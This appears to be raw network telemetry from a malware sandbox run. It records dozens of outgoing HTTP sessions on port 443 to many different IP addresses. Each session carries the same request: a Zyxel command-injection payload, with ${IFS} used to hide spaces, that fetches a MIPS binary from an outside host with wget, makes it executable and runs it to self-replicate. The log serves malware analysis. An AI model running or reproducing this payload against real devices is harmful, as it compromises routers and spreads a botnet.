                                                Jan 12, 2024 18:16:22.430735111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4190192.168.2.2336560172.81.240.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430771112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4191192.168.2.2341324149.206.49.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430830956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192192.168.2.234067263.16.28.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430860996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4193192.168.2.2348360122.24.213.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430890083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4194192.168.2.2332866163.102.221.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430913925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4195192.168.2.2350458123.145.230.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430977106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4196192.168.2.2335598188.248.106.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.430990934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4197192.168.2.2341220157.230.208.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431042910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4198192.168.2.233366814.153.188.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431086063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4199192.168.2.2338352197.130.79.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431129932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4200192.168.2.2358442163.188.26.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431145906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4201192.168.2.2356998205.164.16.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431166887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4202192.168.2.233983242.60.255.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431205988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4203192.168.2.23504964.250.206.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431230068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4204192.168.2.2343896151.58.204.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431288958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4205192.168.2.2359470182.92.91.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431325912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4206192.168.2.2359034103.93.162.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431350946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4207192.168.2.2344480133.9.109.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431385040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4208192.168.2.234584678.15.174.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431421995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4209192.168.2.235192843.32.68.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431453943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4210192.168.2.233993861.248.163.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431521893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4211192.168.2.2340416111.254.45.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431566000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4212192.168.2.2341812142.187.76.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431606054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4213192.168.2.2344792139.209.132.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431634903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4214192.168.2.23341669.74.21.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431684971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4215192.168.2.2347652212.93.48.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431740999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4216192.168.2.2339224138.40.89.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431770086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4217192.168.2.2358350179.113.165.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431793928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4218192.168.2.234043091.151.74.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431833982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4219192.168.2.234825273.14.148.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431890965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4220192.168.2.235641045.238.178.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431910992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4221192.168.2.235432451.68.255.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.431961060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4222192.168.2.2351758165.13.157.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432004929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4223192.168.2.2339998157.201.113.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432035923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4224192.168.2.234917841.30.103.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432075977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4225192.168.2.235283481.80.112.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432117939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4226192.168.2.2352804111.126.220.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432143927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4227192.168.2.2334614128.151.6.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432188034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4228192.168.2.234458849.213.48.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432231903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4229192.168.2.235298079.60.116.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432260990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4230192.168.2.235149273.205.209.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432284117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4231192.168.2.234681284.194.182.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432308912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4232192.168.2.233290493.183.242.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432358980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4233192.168.2.235979893.136.93.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432379007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4234192.168.2.2346870185.190.238.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432398081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4235192.168.2.2345292182.146.140.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432446957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4236192.168.2.2359828171.18.84.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432471991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4237192.168.2.235804020.177.102.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432511091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4238192.168.2.2360046173.68.17.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432549953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4239192.168.2.2355298188.3.128.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432575941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4240192.168.2.235867217.120.129.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432621002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4241192.168.2.235009086.35.56.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432663918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4242192.168.2.2336534115.240.62.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432682037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4243192.168.2.2359018107.248.55.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432718992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4244192.168.2.2337722164.64.137.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432750940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4245192.168.2.234781038.117.152.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432791948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4246192.168.2.2359164154.43.107.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432843924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4247192.168.2.235411092.242.35.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432867050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4248192.168.2.2354456139.71.22.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432888985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4249192.168.2.2347306120.163.50.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432954073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4250192.168.2.233315287.69.151.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.432991028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4251192.168.2.2358556158.109.121.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433017015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4252192.168.2.2341780114.132.19.91443
                                                TimestampBytes transferredDirectionData
